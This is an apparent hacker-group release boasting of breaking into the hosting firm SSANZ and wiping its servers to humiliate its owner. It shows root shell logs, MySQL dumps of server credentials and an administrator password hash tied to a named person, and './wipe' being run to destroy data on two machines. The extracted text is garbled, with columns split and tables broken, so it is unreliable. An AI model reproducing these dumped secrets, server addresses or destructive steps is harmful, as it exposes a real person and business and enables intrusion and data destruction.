__
_____
_____/ |_|__|
______ ____ ____
\__ \ /
\ __\ | ______ / ___// __ \_/ ___\
/ __ \| | \ | | | /_____/ \___ \\ ___/\ \___
(____ /___| /__| |__|
/____ >\___ >\___ >
\/
\/
\/
\/
\/
Some of you have seen a lot of casualtie
s lately in the webhosting scene:
hosting companies being wiped and rm'd a
t the expense of their clients. While
some of this is collateral damage, we're
about to show you, ladies and
gentlemen, that sometimes you aren't pwn
ed because of who you host but what you
say.
Practice what you preach.
- Why SSANZ?
Owned by a kid who claims he can manage, secure and audit servers,
he offers a service that he clearly cannot provide, we are against that.
LoganNZ <http://www.webhostingtalk.com/member.php?u=56008>:
>>Logan of New Zealand. CEO of Server Systems Administration NZ.
>>
>> Signature:
>>Server Systems Administration NZ | SSANZ
>>Got Hacked? | 24/7/365 Remote Emergency Support | Specialist Server Management
>>Affordable Hosting :: Resellers, Shared & Dedicated Server Systems
Server Management $25 - Security & Hardening - $50 <http://www.webhostingtalk.co
m/showthread.php?t=857383>:
>>Server Management - $25 Per Month
>>
>>- Full Management - Support, & 3rd Party Installs
>>- Monitoring - Included - up to 3 ports.
>>- Emergency Recovery
>>Server Security - $50
>>
>>- Initial Scan & Report
>>- Security Hardening & Security Installs/tweaks.
>>- IDS, Security Monitoring & mod_sec configured.
>>- Finishing Security Scan & SSANZ Custom Scans.
>>
>>
>>Emergency Server Recovery - $150
>>
>>- Recover Hacked Server Systems
>>- Recover deleted data
>>- ANTI-dDOS Services
>>- dDOS Investigation
-la
24
27
1
1
1
1
1
1
3
1
3
1
3
1
4
4
3
10
1
1
2
1
1
3
2
4
2
5
1
1
1
1
6
root
root
root
root
root
root
root
root
therockm
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
theweath
root
root
root
root
500
root
root
root
root
root
root
root
root
therockm
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
theweath
root
root
root
root
root
4096
4096
957
1012
15460
24
191
176
4096
141564
4096
18656
4096
14507
4096
4096
4096
4096
430121
100
4096
1176672
16
4096
4096
4096
4096
4096
414870
561
8144
4246
4096
Jul
Jun
Jun
Jun
Jul
Jan
Jan
Jan
Jun
Mar
Nov
Feb
Nov
Oct
Jun
Jun
Jun
Apr
May
Jan
Jun
Jul
Jun
Jun
Jun
Jun
Jun
Jun
Sep
Jun
Jun
Jun
Sep
4
27
13
1
3
6
6
6
5
1
15
28
5
10
1
1
1
13
15
6
1
4
3
1
1
10
1
1
23
27
6
1
13
03:43
02:49
07:24
10:39
23:38
2007
2007
2007
07:26
2007
2006
11:32
2006
2008
14:33
17:10
13:50
16:17
12:07
2007
13:54
03:40
08:34
10:39
10:39
23:42
13:55
17:13
2008
02:48
19:23
10:39
2005
.
..
.accesshash
anaconda-ks.cfg
.bash_history
.bash_logout
.bash_profile
.bashrc
bwm-ng-0.6
bwm-ng-0.6.tar.gz
cmm
cmm.tgz
cmq
cmq.tgz
.cpanel
cpanel3-skel
.cpobjcache
csf
csf.tgz
.cshrc
.elinks
error_log
.forward
.gconf
.gconfd
.gem
.gnupg
htop-0.8.1
htop-0.8.1.tar.gz
.htoprc
index.html
install.log.syslog
iptraf-3.0.0
-rw-r--r--rw-r--r--rw-r--r--rw-r--r-drwx------rw-------rw-------rwxrwxrwx
-rw-r--r-drwxr-xr-x
drwxr-xr-x
-rw------drwx-----drwx------rw-r--r-drwxr-xr-x
-rw------drw------drw-------
1
1
1
1
6
1
1
1
1
2
3
1
3
2
1
3
1
2
3
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
0
0
0
575169
4096
61
139
38688
264
4096
4096
1024
4096
4096
129
4096
0
4096
4096
Jun
Jun
Jun
Jun
Jun
Jun
Jul
Dec
Jul
Jun
Jun
Jun
Jun
Jun
Jan
Jun
Jun
Jun
Jun
27
27
27
27
1
12
3
1
2
1
1
7
1
2
6
7
7
3
10
09:21
09:22
09:24
09:26
14:21
21:04
10:51
2008
21:43
17:04
17:04
19:50
14:29
06:41
2007
21:54
22:01
08:18
08:25
iptraf-3.0.0.tar.gz
iptraf-3.0.0.tar.gz.1
iptraf-3.0.0.tar.gz.2
iptraf-3.0.0.tar.gz.3
.MirrorSearch
.my.cnf
.mysql_history
mysqltuner.pl
.pearrc
public_ftp
public_html
.rnd
.spamassassin
.ssh
.tcshrc
tmp
.trustwavereqs
whmrbackups
whmrcorebackups
| grep -v Never
Port
From
pts/1
125.238.144.224
pts/0
118.69.80.114
pts/1
118.90.48.0
pts/0
189.31.24.129
Latest
Fri Jul
Fri Jun
Sun Jun
Sat Jun
3
12
21
20
20:27:03
00:22:04
04:44:58
10:14:51
-0400
-0400
-0400
-0400
2009
2009
2009
2009
sh-3.2# cd ~billing
sh-3.2# ls -la
total 301252
drwx--x--x 15 billing
drwx--x--x 737 root
lrwxrwxrwx 1 billing
pache/domlogs/billing
-rw------- 1 billing
illing.tar.gz
-rw------- 1 billing
illing.tar.gz
-rw------- 1 billing
lling.tar.gz
-rw------- 1 billing
-rw-r--r-- 1 billing
-rw-r--r-- 1 billing
-rw-r--r-- 1 billing
-rw------- 1 billing
drwxr-xr-x 5 billing
-rw-r----- 1 billing
drwxr-xr-x 2 billing
drwxr-xr-x 3 billing
drwxr-xr-x 2 billing
-rw-r--r-- 1 billing
drwxr-x--- 4 billing
drwxr-x--- 2 billing
-rw-r--r-- 1 billing
-rw------- 1 billing
drwxrwx--- 10 billing
drwxr-xr-x 4 billing
drwxr-xr-x 3 billing
drwxr-x--- 24 billing
drwx------ 4 billing
drwxr-xr-x 7 billing
drwx------ 2 billing
lrwxrwxrwx 1 billing
-rw-r--r-- 1 billing
billing
root
billing
sh-3.2# cd www/
sh-3.2# ls
admin
init.php
banned.php
logout.php
viewticket.php whois.php
affiliates.php
billing
installmingchowping modules
_vti_bin
aff.php
cart.php
knowledgebase.php
networkissues.php
_vti_cnf
announcements.php
cgi-bin
lang
networkissuesrss.php
_vti_inf.html
announcementsrss.php clientarea.php
libs
order.php
_vti_log
announcements.xml
configuration.php
link.php
passwordreminder.php
configuressl.php domainchecker.php
postinfo.html
templates
contact.php
_private
downloads
templates_c
creditcard.php
register.php
downloads.php
tutorials.php
dbconnect.php
htaccess.txt
serverstatus.php
upgrade
display.php
status
images
upgrade.php
dl.php
includes
submitticket.php
viewemail.php
_vti_pvt
attachments
login.php
_vti_txt
configuration.php.new dologin.php
index.php
pipe
supporttickets.php viewinvoice.php
| tblcontacts
|
| tblcredit
|
| tblcurrencies
|
| tblcustomfields
|
| tblcustomfieldsvalues
|
| tbldomainpricing
|
| tbldomains
|
| tbldomainsadditionalfields |
| tbldownloadcats
|
| tbldownloads
|
| tblemails
|
| tblemailtemplates
|
| tblfraud
|
| tblgatewaylog
|
| tblhosting
|
| tblhostingaddons
|
| tblhostingconfigoptions
|
| tblinvoiceitems
|
| tblinvoices
|
| tblknowledgebase
|
| tblknowledgebasecats
|
| tblknowledgebaselinks
|
| tbllinks
|
| tblnetworkissues
|
| tblnotes
|
| tblorders
|
| tblpaymentgateways
|
| tblpricing
|
| tblproductconfiggroups
|
| tblproductconfiglinks
|
| tblproductconfigoptions
|
| tblproductconfigoptionssub |
| tblproductgroups
|
| tblproducts
|
| tblpromotions
|
| tblquoteitems
|
| tblquotes
|
| tblregistrars
|
| tblservers
|
| tblsslorders
|
| tbltax
|
| tblticketbreaklines
|
| tblticketdepartments
|
| tblticketescalations
|
| tblticketlog
|
| tblticketmaillog
|
| tblticketnotes
|
| tblticketpredefinedcats
|
| tblticketpredefinedreplies |
| tblticketreplies
|
| tbltickets
|
| tblticketspamfilters
|
| tbltodolist
|
| tblupgrades
|
| tblwhoislog
|
+----------------------------+
80 rows in set (0.00 sec)
mysql> select name,ipaddress,hostname,username,password from tblservers;
+--------------+----------------+------------------+----------+-----------------
---------------------------------------------------------+
| name
| ipaddress
| hostname
| username | password
|
+--------------+----------------+------------------+----------+-------------------------------------------------------------------------+
| Osiris
| 66.197.143.133 | Osiris.ssanz.net | ssanz
| J4WILwNJpxR0Khyu
PspLOT37zLzLrZ1wyqctabXg3co=
|
| Osiris-Radio | 66.197.143.133 | Osiris.ssanz.net | root
| +V876e3z7tGn9HXE
cOG1TJVPaSsGbj31MnsZ2lw52buNutqcpfBhrPVsKdDssqrh7eDF8g== |
| Devil
| 66.197.204.101 | devil.ssanz.net | root
| n/a/WSvQJp/++la5
CREbl9QijpppzdxP0GjijQRXst2nag9E9PuTVrRO3A==
|
+--------------+----------------+------------------+----------+-------------------------------------------------------------------------+
3 rows in set (0.00 sec)
mysql> select firstname,lastname,email,username,password from tbladmins;
+-----------+----------+-----------------+----------+---------------------------------+
| firstname | lastname | email
| username | password
|
+-----------+----------+-----------------+----------+---------------------------------+
| Logan
| Douglas | Logan@ssanz.net | Admin
| c6df529826cf16ac5bedb424d8
ac972b |
+-----------+----------+-----------------+----------+---------------------------------+
1 row in set (0.06 sec)
mysql> quit
Bye
sh-3.2# df -h
Filesystem
/dev/sda5
/dev/sda8
/dev/sda3
/dev/sda2
/dev/sda1
/dev/sda6
tmpfs
/dev/sdb1
Size
2.0G
875G
9.7G
9.7G
99M
996M
3.9G
459G
Used
477M
147G
6.8G
7.0G
23M
64M
0
163G
Avail
1.4G
684G
2.5G
2.3G
72M
881M
3.9G
273G
Use%
26%
18%
74%
76%
24%
7%
0%
38%
Mounted on
/
/home
/usr
/var
/boot
/tmp
/dev/shm
/backup
sh-3.2# ./wipe
sh-3.2# df -h
Filesystem
/dev/sda5
/dev/sda8
/dev/sda3
/dev/sda2
/dev/sda1
/dev/sda6
tmpfs
/dev/sdb1
sh-3.2# exit
exit
----------------------------------osiris
devil
[ DOWN ]
[ UP ]
-la
23
25
1
1
1
1
1
1
3
1
3
1
4
4
3
2
1
10
1
1
2
1
root
root
root
root
root
root
root
root
1000
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
1000
root
root
root
root
root
root
root
root
root
root
root
root
root
4096
4096
957
937
7258
24
191
176
4096
141564
4096
14507
4096
4096
4096
4096
12207
4096
431490
100
4096
16
Jul
Jun
Jun
Jun
Jun
Jan
Jan
Jan
Jun
Mar
Nov
Oct
Jun
Jun
Jun
Aug
Oct
Jun
Jun
Jan
Jun
Jun
4
29
13
12
30
6
6
6
12
1
5
10
12
12
12
21
10
5
5
6
12
13
04:06
14:33
05:20
00:01
10:03
2007
2007
2007
04:45
2007
2006
2008
02:51
03:26
00:17
2006
2008
05:05
10:52
2007
01:51
15:33
.
..
.accesshash
anaconda-ks.cfg
.bash_history
.bash_logout
.bash_profile
.bashrc
bwm-ng-0.6
bwm-ng-0.6.tar.gz
cmq
cmq.tgz
.cpanel
cpanel3-skel
.cpobjcache
cse
cse.tgz
csf
csf.tgz
.cshrc
.elinks
.forward
drwx-----drwx-----drwxr-xr-x
drwx-----drwxrwxrwx
-rw-r--r--rw-r--r--rw-r--r-drwx------rw------drwxr-xr-x
-rw-r--r--rw-r--r-drwxr-xr-x
drwxr-xr-x
-rw------drwx-----drwx------rw-r--r-drwxr-xr-x
drwxr-xr-x
3
2
4
2
6
1
1
1
6
1
3
1
1
2
3
1
3
2
1
3
2
root
root
root
root
1002
root
root
root
root
root
1000
root
root
root
root
root
root
root
root
root
root
| uniq -c
| uniq -c
| uniq -c
| uniq -c
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c
| sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c
| sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c
| sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c
| sort -n
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c
| sort -n
csf -d 89.38.206.233
csf --restart
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c
| sort -n
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c
| sort -n
csf -d 118.94.59.33
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c
| sort -n
[snip]
screen wget http://download.fedoraproject.org/pub/fedora/linux/releases/11/Live/
i686/Fedora-11-i686-Live.iso
screen wget http://download.fedoraproject.org/pub/fedora/linux/releases/11/Fedor
a/x86_64/iso/Fedora-11-x86_64-DVD.iso
screen wget http://download.fedoraproject.org/pub/fedora/linux/releases/11/Fedor
a/x86_64/iso/Fedora-11-x86_64-netinst.iso
sh-3.2# cat /etc/userdomains
advertising.ssanz.net: adserver
forums.visit4cash.net: forumsv4
megacashzone.com: megacash
visit4cash.net: visit4ca
seanone.com: seanonec
backup2.ssanz.net: backup2
*: nobody
sh-3.2# df -h
Filesystem
/dev/sda3
/dev/sdb1
/dev/sda1
tmpfs
/usr/tmpDSK
sh-3.2# who
root
pts/0
sh-3.2# ./wipe
sh-3.2# df -h
Filesystem
/dev/sda3
/dev/sdb1
/dev/sda1
tmpfs
/usr/tmpDSK
sh-3.2# exit
exit
----------------------------------osiris
devil
[ DOWN ]
[ DOWN ]
----------------------------------Once again, practice what you preach. Don't claim to be something you're not.
Most importantly, don't go after us. We're not the problem. What you say does
not align AT ALL with what you actually do with your servers.
Fix that first, you dig?
~ There will always be no way out.